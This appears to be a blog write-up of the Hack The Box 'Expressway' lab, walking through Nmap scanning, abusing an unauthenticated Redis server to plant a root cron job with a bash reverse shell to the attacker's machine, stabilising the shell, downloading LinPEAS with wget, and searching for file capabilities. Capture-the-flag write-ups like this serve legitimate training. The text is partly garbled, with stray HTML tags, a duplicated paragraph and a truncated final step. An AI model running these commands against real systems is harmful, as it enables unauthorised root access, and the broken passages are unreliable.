Listen to this Post
Introduction:
Hack The Box’s Expressway machine is a classic Linux-based challenge that tests a practitioner’s skills in enumeration, vulnerability assessment, and privilege escalation. Mastering the command line is not just beneficial; it is an absolute necessity for navigating the intricate vulnerabilities of such systems and pivoting from initial foothold to full root compromise.
Learning Objectives:
- Master advanced service enumeration and network reconnaissance techniques.
- Understand and exploit common misconfigurations in services like Redis.
- Execute proven Linux privilege escalation vectors to gain root access.
You Should Know:
1. Initial Reconnaissance with Nmap
`nmap -sC -sV -T4 -oA initial_scan 10.10.11.221`
`nmap –script vuln -oA vuln_scan 10.10.11.221`
Step‑by‑step guide: The first command initiates a comprehensive Nmap scan with default scripts (-sC), version detection (-sV), aggressive timing (-T4), and outputs results in all formats (-oA). The follow-up `vuln` script scan probes for known vulnerabilities. This two-step process is critical for identifying open ports (discovering ports 6379/Redis was key here) and potential weak points without being overly intrusive.
2. Interacting with an Exposed Redis Server
`redis-cli -h 10.10.11.221`
`INFO`
`config set dir /var/spool/cron/crontabs/`
`config set dbfilename root`
`set crackit ” /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.5/4444 0>&1′”`
`save`
Step‑by‑step guide: Upon discovering an unprotected Redis server, use `redis-cli` to connect. The `INFO` command gathers server details. The critical exploit involves reconfiguring Redis’s save directory to the system’s crontab (/var/spool/cron/crontabs/) and setting the filename to root. A cron job payload is written into the database with the `set` command and persisted with save, resulting in a reverse shell execution as root.
3. Stabilizing a Reverse Shell
`python3 -c ‘import pty; pty.spawn(“/bin/bash”)’`
`export TERM=xterm`
`Ctrl+Z`
`stty raw -echo; fg`
Step‑by‑step guide: A raw reverse shell is often unstable. This sequence stabilizes it. The Python command spawns a fully interactive TTY. `export TERM=xterm` enables advanced terminal features. Backgrounding the shell with `Ctrl+Z` and running `stty raw -echo; fg` on the local machine corrects terminal settings, providing a fully interactive shell for efficient navigation.
4. Automated Enumeration with LinPEAS
`cd /dev/shm`
`wget http://10.10.14.5:8000/linpeas.sh`
`chmod +x linpeas.sh</h2>
<h2 style="color: yellow;">./linpeas.sh | tee linpeas_output.txt</h2>
Step‑by‑step guide: Transfer the LinPEAS script from your attacking machine to the target's temporary directory (/dev/shm`). After making it executable, run it and pipe the output to `tee` to simultaneously see it and save it to a file. LinPEAS automates the enumeration of misconfigurations, sensitive files, and potential privilege escalation vectors, saving crucial time.
5. Linux Capability-Based Privilege Escalation
`getcap -r / 2>/dev/null`
<h2 style="color: yellow;">
Step‑by‑step guide: Transfer the LinPEAS script from your attacking machine to the target's temporary directory (
Step‑by‑step guide: This command recursively (-r) searches the entire filesystem (/) for files with assigned capabilities, suppressing permission denied errors (2>/dev/null). Capabilities break down root privileges, and a misconfigured capability like `cap_setuid+ep` on a binary can be exploited to gain root. This is a cleaner, often less detected method than classic SUID exploits.
What Undercode Say:
- The Expressway box is a masterclass in exploiting default configurations. Services like Redis should never be exposed to untrusted networks without authentication.
- Modern privilege escalation is less about obscure kernel exploits and more about meticulous enumeration for misconfigurations in capabilities, cron jobs, and sudo rights.
The simplicity of the Redis cron job exploit underscores a critical lesson in cybersecurity: the most devastating breaches often stem from the most basic oversights. This machine reinforces that penetration testing is a structured process of enumeration, exploitation, and persistence. The heavy reliance on automated tools like LinPEAS highlights a shift in the industry towards leveraging scalable enumeration to quickly identify low-hanging fruit, a skill now fundamental for both red and blue teams. The true takeaway is that defense requires assuming any unhardened service will be found and exploited.
Prediction:
The exploitation of misconfigured auxiliary services like Redis, Docker, and message queues will become the primary initial access vector for mid-level attacks, surpassing traditional web application vulnerabilities. As cloud and DevOps practices accelerate, automation often outpaces security, leaving countless data storage and management services exposed by default. Future offensive security research will focus on developing automated tooling to rapidly identify and weaponize these configuration flaws at scale, forcing a paradigm shift in defensive postures towards strict network segmentation and zero-trust identity management for all services, not just primary applications.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: https://lnkd.in/p/duxahBS5 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
